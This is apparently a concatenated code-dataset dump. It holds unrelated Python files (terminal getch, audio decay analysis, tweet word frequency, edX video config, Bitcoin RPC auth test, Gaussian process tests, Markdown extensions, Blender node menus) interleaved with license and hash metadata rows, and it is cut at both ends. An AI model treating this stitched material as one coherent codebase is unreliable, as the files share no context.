def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
o = ord(ch)
if (o == 0) or (o == 224):
self.scanCode = True
ch = sys.stdin.read(1)
ch = self.echo(ch)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
################################################################################
class _GetchWindows(_GetchCommon):
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
ch = msvcrt.getch()
o = ord(ch)
if (o == 0) or (o == 224):
self.scanCode = True
ch = msvcrt.getch()
ch = self.echo(ch)
return ch
getch = _Getch() | lgpl-3.0 | 2,679,316,217,137,369,000 | 28.213115 | 84 | 0.442885 | false |
gperciva/artifastring | research/mode-detect/short.py | 1 | 2790 | #!/usr/bin/env python
import sys
sys.path.append("../shared/")
import os
import harmonics_data
import sys
import mode_decays
import published_constants
import adjust_decays
import tables
# no clue why I need this. :(
from harmonics_data import HarmonicsStats
def process(dirname, basename, recalc=False, plot=False):
inst = basename.split('-')[0]
st = basename.split('-')[1]
pc = published_constants.PHYSICAL_CONSTANT_RANGES[inst]
# find average tension, length
T = ( pc[st.upper()]['T'][0] + pc[st.upper()]['T'][1] ) / 2
L = ( pc['L'][0] + pc['L'][1] ) / 2
#print T, L
harms = harmonics_data.HarmonicsData(dirname, basename)
decays, f0, B, harm_stats = harms.get_data()
nf, nb, stats = mode_decays.handle_decays(decays,
basename, f0, B, T, L, harm_stats,
plot=plot, recalc=recalc)
return nf, nb, stats, harm_stats
def get_header():
fields = ["name", "B1", "B2", "$R^2$",
"notes", "alpha 1", "alpha 2", "alpha 3",
"alpha 4", "alpha 5", "alpha 10"]
return '\t'.join(fields)
def get_info(basename, nf, nb, stats):
notes = adjust_decays.notes_decays(basename)
text = "%s\t%.3g\t%.3g\t%.2f\t%s\t%.1f\t%.1f\t%.1f\t%.1f\t%.1f\t%.1f" % (
tables.anonymize_name(basename),
nf, nb,
stats.rsquared,
notes,
stats.alpha_1, stats.alpha_2, stats.alpha_3,
stats.alpha_4, stats.alpha_5,
stats.alpha_10,
)
return text
def get_stats_header():
fields = ["name", "total partials",
"max not above noise",
"num not above noise",
"not sufficient drop",
"high variance",
"cannot fit",
"low $R^2$",
"decays used", "highest mode", "notes"]
return '\t'.join(fields)
def get_stats_info(basename, stats):
notes = adjust_decays.notes_removing(basename)
text = "%s\t%i\t%i\t%i\t%i\t%i\t%i\t%i\t%i\t%i\t%s" % (
tables.anonymize_name(basename),
stats.num_harms_original,
stats.num_harms_max_no_above_noise,
stats.num_harms_num_no_above_noise,
stats.num_harms_no_drop,
stats.num_harms_no_variance,
stats.num_harms_no_fit,
stats.num_harms_no_rsquared,
stats.num_harms_end,
stats.highest_harm,
notes,
)
return text
if __name__ == "__main__":
try:
#dirname = sys.argv[1]
dirname = "yvr"
basename = sys.argv[1]
except:
print "biology.py DIRNAME BASENAME"
if not os.path.isdir("out"):
os.makedirs("out")
nf, nb, stats, harm_stats = process(dirname, basename, plot=True)
print get_header()
print get_info(basename, nf, nb, stats)
print
print get_stats_header()
print get_stats_info(basename, harm_stats)
| gpl-3.0 | -686,684,109,385,111,900 | 26.352941 | 77 | 0.58638 | false |
ylam/DataScienceCoursera | frequency_2.py | 1 | 1211 | import sys
import json
def hw():
print 'Hello, world!'
def lines(fp):
print str(len(fp.readlines()))
def main():
tweet_file = open(sys.argv[1])
#hw()
#lines(sent_file)
#lines(tweet_file)
#save tweet files
myData = {}
#save tweet counts
Result = {}
#save frequency
Frequency = {}
CountAllTerms = 0;
for line in tweet_file:
#Save every line into myData
myData = json.loads(line)
#print "Line " + str(i)
#print myData
#print myData.keys()
if "text" in myData and "lang" in myData:
if myData["lang"] == 'en':
				#Split each word found in the text and count its occurrences.
tweet = myData["text"]
tweet = tweet.lower()
words = tweet.split()
for word in words:
if word not in Result:
Result[word] = 1;
elif word in Result:
Result[word] = Result[word] + 1;
CountAllTerms = CountAllTerms + 1;
	#Output to standard out the total count of all term occurrences
	#print Result.items()
	print "Occurrence of all terms " + str(CountAllTerms);
for term in Result:
Frequency[term] = Result[term] / (CountAllTerms * 1.0)
print Frequency.items()
if __name__ == '__main__':
main()
| gpl-2.0 | 8,787,856,851,238,190,000 | 21.425926 | 69 | 0.609414 | false |
edx/edxanalytics | src/edxanalytics/edxmodules/video_analytics/common.py | 1 | 3765 | """
Configuration for every video player / site.
- Properties (prefix none): names of video properties (e.g., autoplay on?)
- Events (prefix EVT): names of video events (e.g., video_play)
To add a new target, simply copy an existing block, paste, and modify.
- normal values: boolean or string or list with one item
- doesn't exist: empty string or list (e.g., '', [])
- multiple values: list (e.g., ['a', 'b', 'c'])
- hierarchical values: nested list (e.g., ['a', ['aa']])
"""
import ast
"""
The edX trackinglog schema...
"track_trackinglog"
("username" varchar(32) NOT NULL,
"dtcreated" datetime NOT NULL,
"event_source" varchar(32) NOT NULL,
"event_type" varchar(512) NOT NULL,
"ip" varchar(32) NOT NULL,
"agent" varchar(256) NOT NULL,
"event" text NOT NULL,
{"id":"i4x-MITx-6_002x-video-S1V1_Motivation_for_6_002x",
"code":"4rpg8Bq6hb4",
"currentTime":0,
"speed":"1.0"}
"host" varchar(64) NOT NULL DEFAULT '',
"time" datetime NOT NULL,
"id" integer PRIMARY KEY,
"page" varchar(512) NULL);
"""
EDX_CONF = {
### properties ###
# Does the video autoplay?
'AUTOPLAY_VIDEOS': True,
# Where is this video hosted?
'VIDEO_HOST': 'youtube',
# Where is the absolute timestamp of an event stored?
'TIMESTAMP': 'time',
# Where is the event type information stored?
'TYPE_EVENT': 'event_type',
# Where is the username stored?
'USERNAME': 'username',
# Where is the video ID stored?
'VIDEO_ID': ['event', ['code']],
# Where is the video name stored?
'VIDEO_NAME': ['event', ['id']],
# Where is the relative video timestamp stored?
'VIDEO_TIME': ['event', ['currentTime']],
# Where is the play speed stored?
'VIDEO_SPEED': ['event', ['speed']],
### events ###
# Where is the page open event?
'EVT_PAGE_OPEN': ['page_open'],
# Where is the page close event?
'EVT_PAGE_CLOSE': ['page_close'],
# Where is the next destination event?
'EVT_NEXT_DST': ['seq_goto', 'seq_next', 'seq_prev'],
# Where is the player pause event?
'EVT_VIDEO_PAUSE': ['pause_video'],
# Where is the player play event?
'EVT_VIDEO_PLAY': ['play_video'],
# Where is the player seek event?
'EVT_VIDEO_SEEK': [],
# Where is the fullscreen event?
'EVT_VIDEO_FULLSCREEN': [],
# Where is the volume up event?
'EVT_VIDEO_VOLUME_UP': [],
# Where is the volume down event?
'EVT_VIDEO_VOLUME_DOWN': [],
# Where is the volume mute event?
'EVT_VIDEO_VOLUME_MUTE': [],
}
# This is how external files access configuration parameters.
# Need to be changed to any other XX_CONF when using non-edX platforms
CONF = EDX_CONF
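# Illustrative lookup (not part of the original module; the sample row below is
# made up, shaped like the trackinglog schema quoted above):
#
#     sample_row = {
#         "event_type": "play_video",
#         "username": "student1",
#         "event": '{"id": "i4x-MITx-6_002x-video-S1V1", "code": "4rpg8Bq6hb4", "currentTime": 0}',
#     }
#     get_prop(sample_row, 'VIDEO_ID')    # -> "4rpg8Bq6hb4"  (via ['event', ['code']])
#     get_prop(sample_row, 'VIDEO_TIME')  # -> 0              (via ['event', ['currentTime']])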
def get_inner_prop(obj, prop):
"""
Has recursive handling for hierarchical data formats.
"""
if isinstance(obj, str) or isinstance(obj, unicode):
try:
obj = ast.literal_eval(obj)
except ValueError:
pass
#print "value error, ignoring line"
except SyntaxError:
pass
#print "syntax error, ignoring line"
if isinstance(prop, str) or isinstance(prop, unicode):
if prop not in obj:
return ""
else:
return obj[prop]
elif isinstance(prop, list):
if len(prop) == 2:
return get_inner_prop(obj[prop[0]], prop[1])
if len(prop) == 1:
try:
value = obj[prop[0]]
except:
value = ""
return value
return ""
def get_prop(obj, prop):
"""
Get property values for the given (obj, prop) pair.
"""
if prop == "" or prop not in CONF:
return ""
feature = CONF[prop]
return get_inner_prop(obj, feature)
| agpl-3.0 | -8,471,714,969,963,333,000 | 30.638655 | 74 | 0.592563 | false |
tjps/bitcoin | test/functional/rpc_users.py | 1 | 4247 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiple RPC users."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
get_datadir_path,
str_to_b64str,
)
import os
import http.client
import urllib.parse
import subprocess
from random import SystemRandom
import string
import configparser
import sys
def call_with_auth(node, user, password):
url = urllib.parse.urlparse(node.url)
headers = {"Authorization": "Basic " + str_to_b64str('{}:{}'.format(user, password))}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
conn.close()
return resp
class HTTPBasicsTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.supports_cli = False
def setup_chain(self):
super().setup_chain()
#Append rpcauth to bitcoin.conf before initialization
self.rtpassword = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
self.rpcuser = "rpcuser💻"
self.rpcpassword = "rpcpassword🔑"
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
gen_rpcauth = config['environment']['RPCAUTH']
# Generate RPCAUTH with specified password
self.rt2password = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
p = subprocess.Popen([sys.executable, gen_rpcauth, 'rt2', self.rt2password], stdout=subprocess.PIPE, universal_newlines=True)
lines = p.stdout.read().splitlines()
rpcauth2 = lines[1]
# Generate RPCAUTH without specifying password
self.user = ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(10))
p = subprocess.Popen([sys.executable, gen_rpcauth, self.user], stdout=subprocess.PIPE, universal_newlines=True)
lines = p.stdout.read().splitlines()
rpcauth3 = lines[1]
self.password = lines[3]
with open(os.path.join(get_datadir_path(self.options.tmpdir, 0), "bitcoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
f.write(rpcauth3+"\n")
with open(os.path.join(get_datadir_path(self.options.tmpdir, 1), "bitcoin.conf"), 'a', encoding='utf8') as f:
f.write("rpcuser={}\n".format(self.rpcuser))
f.write("rpcpassword={}\n".format(self.rpcpassword))
def test_auth(self, node, user, password):
self.log.info('Correct...')
assert_equal(200, call_with_auth(node, user, password).status)
self.log.info('Wrong...')
assert_equal(401, call_with_auth(node, user, password+'wrong').status)
self.log.info('Wrong...')
assert_equal(401, call_with_auth(node, user+'wrong', password).status)
self.log.info('Wrong...')
assert_equal(401, call_with_auth(node, user+'wrong', password+'wrong').status)
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
self.test_auth(self.nodes[0], url.username, url.password)
self.test_auth(self.nodes[0], 'rt', self.rtpassword)
self.test_auth(self.nodes[0], 'rt2', self.rt2password)
self.test_auth(self.nodes[0], self.user, self.password)
###############################################################
# Check correctness of the rpcuser/rpcpassword config options #
###############################################################
url = urllib.parse.urlparse(self.nodes[1].url)
self.test_auth(self.nodes[1], self.rpcuser, self.rpcpassword)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| mit | 5,873,558,166,899,214,000 | 38.635514 | 133 | 0.624853 | false |
ccauet/scikit-optimize | skopt/learning/gaussian_process/tests/test_gpr.py | 1 | 3320 | import numpy as np
import pytest
from scipy import optimize
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from skopt.learning import GaussianProcessRegressor
from skopt.learning.gaussian_process.kernels import RBF
from skopt.learning.gaussian_process.kernels import Matern
from skopt.learning.gaussian_process.kernels import WhiteKernel
from skopt.learning.gaussian_process.gpr import _param_for_white_kernel_in_Sum
rng = np.random.RandomState(0)
X = rng.randn(5, 5)
y = rng.randn(5)
rbf = RBF()
wk = WhiteKernel()
mat = Matern()
kernel1 = rbf
kernel2 = mat + rbf
kernel3 = mat * rbf
kernel4 = wk * rbf
kernel5 = mat + rbf * wk
def predict_wrapper(X, gpr):
"""Predict that can handle 1-D input"""
X = np.expand_dims(X, axis=0)
return gpr.predict(X, return_std=True)
@pytest.mark.fast_test
@pytest.mark.parametrize("kernel", [kernel1, kernel2, kernel3, kernel4])
def test_param_for_white_kernel_in_Sum(kernel):
kernel_with_noise = kernel + wk
wk_present, wk_param = _param_for_white_kernel_in_Sum(kernel + wk)
assert_true(wk_present)
kernel_with_noise.set_params(
**{wk_param: WhiteKernel(noise_level=0.0)})
assert_array_equal(kernel_with_noise(X), kernel(X))
assert_false(_param_for_white_kernel_in_Sum(kernel5)[0])
@pytest.mark.fast_test
def test_noise_equals_gaussian():
gpr1 = GaussianProcessRegressor(rbf + wk).fit(X, y)
# gpr2 sets the noise component to zero at predict time.
gpr2 = GaussianProcessRegressor(rbf, noise="gaussian").fit(X, y)
assert_false(gpr1.noise_)
assert_true(gpr2.noise_)
assert_almost_equal(gpr1.kernel_.k2.noise_level, gpr2.noise_, 4)
mean1, std1 = gpr1.predict(X, return_std=True)
mean2, std2 = gpr2.predict(X, return_std=True)
assert_array_almost_equal(mean1, mean2, 4)
assert_false(np.any(std1 == std2))
@pytest.mark.fast_test
def test_mean_gradient():
length_scale = np.arange(1, 6)
X = rng.randn(10, 5)
y = rng.randn(10)
X_new = rng.randn(5)
rbf = RBF(length_scale=length_scale, length_scale_bounds="fixed")
gpr = GaussianProcessRegressor(rbf, random_state=0).fit(X, y)
mean, std, mean_grad = gpr.predict(
np.expand_dims(X_new, axis=0),
return_std=True, return_cov=False, return_mean_grad=True)
num_grad = optimize.approx_fprime(
X_new, lambda x: predict_wrapper(x, gpr)[0], 1e-4)
assert_array_almost_equal(mean_grad, num_grad, decimal=3)
@pytest.mark.fast_test
def test_std_gradient():
length_scale = np.arange(1, 6)
X = rng.randn(10, 5)
y = rng.randn(10)
X_new = rng.randn(5)
rbf = RBF(length_scale=length_scale, length_scale_bounds="fixed")
gpr = GaussianProcessRegressor(rbf, random_state=0).fit(X, y)
_, _, _, std_grad = gpr.predict(
np.expand_dims(X_new, axis=0),
return_std=True, return_cov=False, return_mean_grad=True,
return_std_grad=True)
num_grad = optimize.approx_fprime(
X_new, lambda x: predict_wrapper(x, gpr)[1], 1e-4)
assert_array_almost_equal(std_grad, num_grad, decimal=3)
| bsd-3-clause | 1,136,411,059,373,997,400 | 31.871287 | 78 | 0.697289 | false |
sarimak/generator | markdown_extensions.py | 1 | 2173 | #!/usr/bin/python3
# coding: utf-8
""" Register two Markdown extensions which replace <a href=""> and
<img src=""> with {{ url_for('') }} and {{ resource('') }} placeholders
which can be rewritten to absolute URLs and paths to static resources. """
import markdown
import markdown.inlinepatterns
class UrlForExtension(markdown.Extension):
""" Custom handler for URL parsing within the Markdown. """
def extendMarkdown(self, parser, _):
pattern = UrlForPattern(markdown.inlinepatterns.LINK_RE, parser)
parser.inlinePatterns["link"] = pattern
class UrlForPattern(markdown.inlinepatterns.LinkPattern):
""" Delegates mangling of link targets in Markdown to url_for() """
def handleMatch(self, match):
anchor = super().handleMatch(match)
href = anchor.get("href")
anchor.set("href", "{{{{ url_for('{}') }}}}".format(href))
return anchor
class ResourceExtension(markdown.Extension):
""" Custom handler for image parsing within the Markdown. """
def extendMarkdown(self, parser, _):
pattern = ResourcePattern(markdown.inlinepatterns.IMAGE_LINK_RE, parser)
parser.inlinePatterns["image_link"] = pattern
class ResourcePattern(markdown.inlinepatterns.ImagePattern):
""" Delegates mangling of image sources in Markdown to resource() """
def handleMatch(self, match):
img = super().handleMatch(match)
src = img.get("src")
img.set("src", "{{{{ resource('{}') }}}}".format(src))
return img
EXTENSIONS = [UrlForExtension(), ResourceExtension()]
# pylint: disable=C0111
def parse(markup):
""" Parse the provided Markdown using the custom handlers. """
return markdown.markdown(markup, extensions=EXTENSIONS)
def test_resource_for_extension():
assert parse("") == \
'<p><img alt="desc" src="{{ resource(\'picture.png\') }}" /></p>'
def test_url_for_extension():
assert parse("#title") == "<h1>title</h1>"
assert parse("[desc](locator)") == \
'<p><a href="{{ url_for(\'locator\') }}">desc</a></p>'
if __name__ == "__main__":
import pytest
import sys
pytest.main(sys.argv[0])
| gpl-2.0 | -1,098,341,667,282,342,700 | 35.216667 | 80 | 0.649793 | false |
Microvellum/Fluid-Designer | win64-vc/2.78/Python/bin/2.78/scripts/startup/nodeitems_builtins.py | 1 | 19000 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
import nodeitems_utils
from nodeitems_utils import (
NodeCategory,
NodeItem,
NodeItemCustom,
)
# Subclasses for standard node types
class SortedNodeCategory(NodeCategory):
def __init__(self, identifier, name, description="", items=None):
# for builtin nodes the convention is to sort by name
if isinstance(items, list):
items = sorted(items, key=lambda item: item.label.lower())
super().__init__(identifier, name, description, items)
class CompositorNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return (context.space_data.tree_type == 'CompositorNodeTree')
class ShaderNewNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return (context.space_data.tree_type == 'ShaderNodeTree' and
context.scene.render.use_shading_nodes)
class ShaderOldNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return (context.space_data.tree_type == 'ShaderNodeTree' and
not context.scene.render.use_shading_nodes)
class TextureNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return context.space_data.tree_type == 'TextureNodeTree'
# menu entry for node group tools
def group_tools_draw(self, layout, context):
layout.operator("node.group_make")
layout.operator("node.group_ungroup")
layout.separator()
# maps node tree type to group node type
node_tree_group_type = {
'CompositorNodeTree': 'CompositorNodeGroup',
'ShaderNodeTree': 'ShaderNodeGroup',
'TextureNodeTree': 'TextureNodeGroup',
}
# generic node group items generator for shader, compositor and texture node groups
def node_group_items(context):
if context is None:
return
space = context.space_data
if not space:
return
ntree = space.edit_tree
if not ntree:
return
yield NodeItemCustom(draw=group_tools_draw)
def contains_group(nodetree, group):
if nodetree == group:
return True
else:
for node in nodetree.nodes:
if node.bl_idname in node_tree_group_type.values() and node.node_tree is not None:
if contains_group(node.node_tree, group):
return True
return False
for group in context.blend_data.node_groups:
if group.bl_idname != ntree.bl_idname:
continue
# filter out recursive groups
if contains_group(group, ntree):
continue
yield NodeItem(node_tree_group_type[group.bl_idname],
group.name,
{"node_tree": "bpy.data.node_groups[%r]" % group.name})
# only show input/output nodes inside node groups
def group_input_output_item_poll(context):
space = context.space_data
if space.edit_tree in bpy.data.node_groups.values():
return True
return False
# only show input/output nodes when editing line style node trees
def line_style_shader_nodes_poll(context):
snode = context.space_data
return (snode.tree_type == 'ShaderNodeTree' and
snode.shader_type == 'LINESTYLE')
# only show nodes working in world node trees
def world_shader_nodes_poll(context):
snode = context.space_data
return (snode.tree_type == 'ShaderNodeTree' and
snode.shader_type == 'WORLD')
# only show nodes working in object node trees
def object_shader_nodes_poll(context):
snode = context.space_data
return (snode.tree_type == 'ShaderNodeTree' and
snode.shader_type == 'OBJECT')
# All standard node categories currently used in nodes.
shader_node_categories = [
# Shader Nodes
ShaderOldNodeCategory("SH_INPUT", "Input", items=[
NodeItem("ShaderNodeMaterial"),
NodeItem("ShaderNodeCameraData"),
NodeItem("ShaderNodeFresnel"),
NodeItem("ShaderNodeLayerWeight"),
NodeItem("ShaderNodeLampData"),
NodeItem("ShaderNodeValue"),
NodeItem("ShaderNodeRGB"),
NodeItem("ShaderNodeTexture"),
NodeItem("ShaderNodeGeometry"),
NodeItem("ShaderNodeExtendedMaterial"),
NodeItem("ShaderNodeParticleInfo"),
NodeItem("ShaderNodeObjectInfo"),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
ShaderOldNodeCategory("SH_OUTPUT", "Output", items=[
NodeItem("ShaderNodeOutput"),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
ShaderOldNodeCategory("SH_OP_COLOR", "Color", items=[
NodeItem("ShaderNodeMixRGB"),
NodeItem("ShaderNodeRGBCurve"),
NodeItem("ShaderNodeInvert"),
NodeItem("ShaderNodeHueSaturation"),
NodeItem("ShaderNodeGamma"),
]),
ShaderOldNodeCategory("SH_OP_VECTOR", "Vector", items=[
NodeItem("ShaderNodeNormal"),
NodeItem("ShaderNodeMapping"),
NodeItem("ShaderNodeVectorCurve"),
NodeItem("ShaderNodeVectorTransform"),
NodeItem("ShaderNodeNormalMap"),
]),
ShaderOldNodeCategory("SH_CONVERTOR", "Converter", items=[
NodeItem("ShaderNodeValToRGB"),
NodeItem("ShaderNodeRGBToBW"),
NodeItem("ShaderNodeMath"),
NodeItem("ShaderNodeVectorMath"),
NodeItem("ShaderNodeSqueeze"),
NodeItem("ShaderNodeSeparateRGB"),
NodeItem("ShaderNodeCombineRGB"),
NodeItem("ShaderNodeSeparateHSV"),
NodeItem("ShaderNodeCombineHSV"),
]),
ShaderOldNodeCategory("SH_GROUP", "Group", items=node_group_items),
ShaderOldNodeCategory("SH_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
]),
# New Shader Nodes (Cycles)
ShaderNewNodeCategory("SH_NEW_INPUT", "Input", items=[
NodeItem("ShaderNodeTexCoord"),
NodeItem("ShaderNodeAttribute"),
NodeItem("ShaderNodeLightPath"),
NodeItem("ShaderNodeFresnel"),
NodeItem("ShaderNodeLayerWeight"),
NodeItem("ShaderNodeRGB"),
NodeItem("ShaderNodeValue"),
NodeItem("ShaderNodeTangent"),
NodeItem("ShaderNodeNewGeometry"),
NodeItem("ShaderNodeWireframe"),
NodeItem("ShaderNodeObjectInfo"),
NodeItem("ShaderNodeHairInfo"),
NodeItem("ShaderNodeParticleInfo"),
NodeItem("ShaderNodeCameraData"),
NodeItem("ShaderNodeUVMap"),
NodeItem("ShaderNodeUVAlongStroke", poll=line_style_shader_nodes_poll),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
ShaderNewNodeCategory("SH_NEW_OUTPUT", "Output", items=[
NodeItem("ShaderNodeOutputMaterial", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeOutputLamp", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeOutputWorld", poll=world_shader_nodes_poll),
NodeItem("ShaderNodeOutputLineStyle", poll=line_style_shader_nodes_poll),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
ShaderNewNodeCategory("SH_NEW_SHADER", "Shader", items=[
NodeItem("ShaderNodeMixShader"),
NodeItem("ShaderNodeAddShader"),
NodeItem("ShaderNodeBsdfDiffuse", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfPrincipled", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfGlossy", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfTransparent", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfRefraction", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfGlass", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfTranslucent", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfAnisotropic", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfVelvet", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfToon", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeSubsurfaceScattering", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeEmission", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfHair", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBackground", poll=world_shader_nodes_poll),
NodeItem("ShaderNodeAmbientOcclusion", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeHoldout", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeVolumeAbsorption"),
NodeItem("ShaderNodeVolumeScatter"),
]),
ShaderNewNodeCategory("SH_NEW_TEXTURE", "Texture", items=[
NodeItem("ShaderNodeTexImage"),
NodeItem("ShaderNodeTexEnvironment"),
NodeItem("ShaderNodeTexSky"),
NodeItem("ShaderNodeTexNoise"),
NodeItem("ShaderNodeTexWave"),
NodeItem("ShaderNodeTexVoronoi"),
NodeItem("ShaderNodeTexMusgrave"),
NodeItem("ShaderNodeTexGradient"),
NodeItem("ShaderNodeTexMagic"),
NodeItem("ShaderNodeTexChecker"),
NodeItem("ShaderNodeTexBrick"),
NodeItem("ShaderNodeTexPointDensity"),
]),
ShaderNewNodeCategory("SH_NEW_OP_COLOR", "Color", items=[
NodeItem("ShaderNodeMixRGB"),
NodeItem("ShaderNodeRGBCurve"),
NodeItem("ShaderNodeInvert"),
NodeItem("ShaderNodeLightFalloff"),
NodeItem("ShaderNodeHueSaturation"),
NodeItem("ShaderNodeGamma"),
NodeItem("ShaderNodeBrightContrast"),
]),
ShaderNewNodeCategory("SH_NEW_OP_VECTOR", "Vector", items=[
NodeItem("ShaderNodeMapping"),
NodeItem("ShaderNodeBump"),
NodeItem("ShaderNodeNormalMap"),
NodeItem("ShaderNodeNormal"),
NodeItem("ShaderNodeVectorCurve"),
NodeItem("ShaderNodeVectorTransform"),
]),
ShaderNewNodeCategory("SH_NEW_CONVERTOR", "Converter", items=[
NodeItem("ShaderNodeMath"),
NodeItem("ShaderNodeValToRGB"),
NodeItem("ShaderNodeRGBToBW"),
NodeItem("ShaderNodeVectorMath"),
NodeItem("ShaderNodeSeparateRGB"),
NodeItem("ShaderNodeCombineRGB"),
NodeItem("ShaderNodeSeparateXYZ"),
NodeItem("ShaderNodeCombineXYZ"),
NodeItem("ShaderNodeSeparateHSV"),
NodeItem("ShaderNodeCombineHSV"),
NodeItem("ShaderNodeWavelength"),
NodeItem("ShaderNodeBlackbody"),
]),
ShaderNewNodeCategory("SH_NEW_SCRIPT", "Script", items=[
NodeItem("ShaderNodeScript"),
]),
ShaderNewNodeCategory("SH_NEW_GROUP", "Group", items=node_group_items),
ShaderNewNodeCategory("SH_NEW_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
]),
]
compositor_node_categories = [
# Compositor Nodes
CompositorNodeCategory("CMP_INPUT", "Input", items=[
NodeItem("CompositorNodeRLayers"),
NodeItem("CompositorNodeImage"),
NodeItem("CompositorNodeMovieClip"),
NodeItem("CompositorNodeMask"),
NodeItem("CompositorNodeRGB"),
NodeItem("CompositorNodeValue"),
NodeItem("CompositorNodeTexture"),
NodeItem("CompositorNodeBokehImage"),
NodeItem("CompositorNodeTime"),
NodeItem("CompositorNodeTrackPos"),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
CompositorNodeCategory("CMP_OUTPUT", "Output", items=[
NodeItem("CompositorNodeComposite"),
NodeItem("CompositorNodeViewer"),
NodeItem("CompositorNodeSplitViewer"),
NodeItem("CompositorNodeOutputFile"),
NodeItem("CompositorNodeLevels"),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
CompositorNodeCategory("CMP_OP_COLOR", "Color", items=[
NodeItem("CompositorNodeMixRGB"),
NodeItem("CompositorNodeAlphaOver"),
NodeItem("CompositorNodeInvert"),
NodeItem("CompositorNodeCurveRGB"),
NodeItem("CompositorNodeHueSat"),
NodeItem("CompositorNodeColorBalance"),
NodeItem("CompositorNodeHueCorrect"),
NodeItem("CompositorNodeBrightContrast"),
NodeItem("CompositorNodeGamma"),
NodeItem("CompositorNodeColorCorrection"),
NodeItem("CompositorNodeTonemap"),
NodeItem("CompositorNodeZcombine"),
]),
CompositorNodeCategory("CMP_CONVERTOR", "Converter", items=[
NodeItem("CompositorNodeMath"),
NodeItem("CompositorNodeValToRGB"),
NodeItem("CompositorNodeSetAlpha"),
NodeItem("CompositorNodePremulKey"),
NodeItem("CompositorNodeIDMask"),
NodeItem("CompositorNodeRGBToBW"),
NodeItem("CompositorNodeSepRGBA"),
NodeItem("CompositorNodeCombRGBA"),
NodeItem("CompositorNodeSepHSVA"),
NodeItem("CompositorNodeCombHSVA"),
NodeItem("CompositorNodeSepYUVA"),
NodeItem("CompositorNodeCombYUVA"),
NodeItem("CompositorNodeSepYCCA"),
NodeItem("CompositorNodeCombYCCA"),
NodeItem("CompositorNodeSwitchView"),
]),
CompositorNodeCategory("CMP_OP_FILTER", "Filter", items=[
NodeItem("CompositorNodeBlur"),
NodeItem("CompositorNodeBilateralblur"),
NodeItem("CompositorNodeDilateErode"),
NodeItem("CompositorNodeDespeckle"),
NodeItem("CompositorNodeFilter"),
NodeItem("CompositorNodeBokehBlur"),
NodeItem("CompositorNodeVecBlur"),
NodeItem("CompositorNodeDefocus"),
NodeItem("CompositorNodeGlare"),
NodeItem("CompositorNodeInpaint"),
NodeItem("CompositorNodeDBlur"),
NodeItem("CompositorNodePixelate"),
NodeItem("CompositorNodeSunBeams"),
]),
CompositorNodeCategory("CMP_OP_VECTOR", "Vector", items=[
NodeItem("CompositorNodeNormal"),
